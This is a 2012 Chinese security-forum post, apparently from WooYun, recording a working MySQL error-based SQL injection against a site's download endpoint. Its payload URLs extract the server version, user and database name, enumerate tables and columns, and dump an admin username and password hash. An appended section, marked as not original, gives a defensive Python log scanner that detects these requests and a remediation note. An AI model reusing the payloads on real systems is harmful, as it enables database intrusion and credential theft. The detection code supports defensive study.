php+mysql advanced error-based injection, tested and confirmed working

Posted on 2012-9-13 17:52:09
http://www.wooyun.org/bugs/wooyun-2010-01666

I had been looking for something to test this on and did not expect to find it here. It can be tested; this is just a record.

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

/data0/htdocs/leqi_new/app/myapp.php

Or

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/  leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********Enumerate database names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********Enumerate table names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********Enumerate column names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 341 351 361
/**********Dump data**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd
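
Added example, not part of the original post: a log-review sketch for defenders that flags requests carrying the count(*) / floor(rand(0)*2) / group by combination seen in the requests above and extracts the expression each request targeted, so responders can tell what was exposed. The log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (documentation IPs, assumed combined-log layout).
SAMPLE_LOG = """\
203.0.113.7 - - [13/Sep/2012:17:40:01 +0800] "GET /download/downpage/netarea/id/1600003/wapc/5000_0005_003 HTTP/1.1" 200 5120
203.0.113.9 - - [13/Sep/2012:17:41:12 +0800] "GET /download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003 HTTP/1.1" 200 312
203.0.113.9 - - [13/Sep/2012:17:43:30 +0800] "GET /download/downpage/netarea/id/1600003%27%20or%201=(select%201%20from%20(select%20COUNT(*),CONCAT((select%20passwd%20from%20users%20limit%200,1),FLOOR(RAND(0)*2))x%20from%20information_schema.tables%20GROUP%20BY%20x)a)%23 HTTP/1.1" 200 298
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# The three parts that co-occur in every request of the post.
RAND_FLOOR = re.compile(r"floor\s*\(\s*rand\s*\([^)]*\)\s*\*\s*2\s*\)")
COUNT_STAR = re.compile(r"count\s*\(\s*\*\s*\)")
GROUP_BY = re.compile(r"group\s+by")
# Subquery concatenated into the grouping key (optionally wrapped in 0x..
# delimiters, as in the first request of the post).
LEAKED = re.compile(
    r"concat\s*\(\s*(?:0x[0-9a-f]+\s*,\s*)?\(\s*(select .+?)\)\s*,"
    r"\s*(?:0x[0-9a-f]+\s*,\s*)?floor")

def normalize(target):
    """URL-decode, collapse whitespace and lower-case one request target."""
    return re.sub(r"\s+", " ", unquote_plus(target)).lower()

def is_error_based(text):
    """True when all three signature parts appear in the normalized target."""
    return all(p.search(text) for p in (RAND_FLOOR, COUNT_STAR, GROUP_BY))

def scan(log_text):
    """Return [(client, targeted_expression)] for matching requests."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        text = normalize(m.group(2))
        if is_error_based(text):
            leak = LEAKED.search(text)
            hits.append((m.group(1), leak.group(1) if leak else "unknown"))
    return hits

if __name__ == "__main__":
    for client, expr in scan(SAMPLE_LOG):
        print(f"{client} error-based SQLi request, targeted: {expr}")
```

Matching requests only scope the incident. The fix is to bind the id path segment as a query parameter and stop returning MySQL error text to clients.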